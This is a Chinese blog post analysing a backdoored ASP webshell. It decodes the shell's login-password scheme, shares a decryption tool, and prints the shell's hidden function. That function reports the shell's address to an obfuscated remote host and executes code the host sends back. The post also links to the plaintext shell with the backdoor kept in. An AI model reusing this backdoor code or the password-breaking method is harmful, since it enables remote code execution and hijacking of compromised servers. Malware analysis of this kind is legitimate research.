• 欢迎访问金刀客博客!
  • 2019,春节快乐!

Serinf加密解密工具

原创天空 admin 8408次浏览 已收录 1个评论

xyinternetus在http://www.daokers.net/read.php?tid=951(【讨论】有个2008年的大马 请人帮我解密 谢谢 挑战性有点吧!)发了一个shell,求其shell的密码是多少,解密后从明文中得知其密码是
UserPass=”171298273197298273193298273196298273189298273134298273″
继续追踪,在密码正确性判断处得此代码
if Serinf(request.form(“pass”),pn)=UserPass then:session(“web2a2dmin”)=UserPass
寻的其Serinf函数为
Function Serinf(getstr, Pos)
Dim i, newStr
For i = 1 To Len(getstr)
newStr = newStr & Asc(Mid(getstr, i, 1))+Pos & (298361 – Pos)
Next
Serinf = newStr
End Function
找到pn=88
那么这个密码验证的基本思路就是首先获得输入密码值request.form(“pass”),设置pn值,之后导入函数Serinf中运算,如果与UserPass相同则正确,反之则非法登陆。
尝试了一下,写了这个加解密小工具,希望有用。

另外此shell存在利用xmlhttp发送shell地址的后门,这里传上明文(没有去后门),请有兴趣的朋友玩玩。
发送后门地址函数(xmlhttp):
function SererInf(inf)
on error resume next
Set theserver=Server.createobject(Sot(13,0))
theserver.open “GET”,right(sot(13,0),4)&chr(60-pos)&”/”&chr(pos+45)&inf&chr(46)&mid(sot(4,0),2,1)&chr(109+pos)&right(Sot(6,0),1)&chr(47)&right(sot(1,0),1),false:theserver.send()
if theserver.readystate<>4 then
exit function
end if
execute(theserver.responseText)
set theserver=nothing
if err.number<>0 then err.Clear:end if
end function
shell界面

点击下载Serinf加密解密工具
其它文件在刀城,自己看看吧
其它下载地址
欢迎在此留言,也欢迎加入刀城交流,此文刀城地址:http://www.daokers.net/read.php?tid=987


金刀客博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明Serinf加密解密工具
喜欢 (4)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到
(1)个小伙伴在吐槽
  1. 下来试试
    admin 于 2010-04-03 04:58 PM 回复
    绝对值得你这样做,:-D
    xinxin6662010-04-03 11:44 回复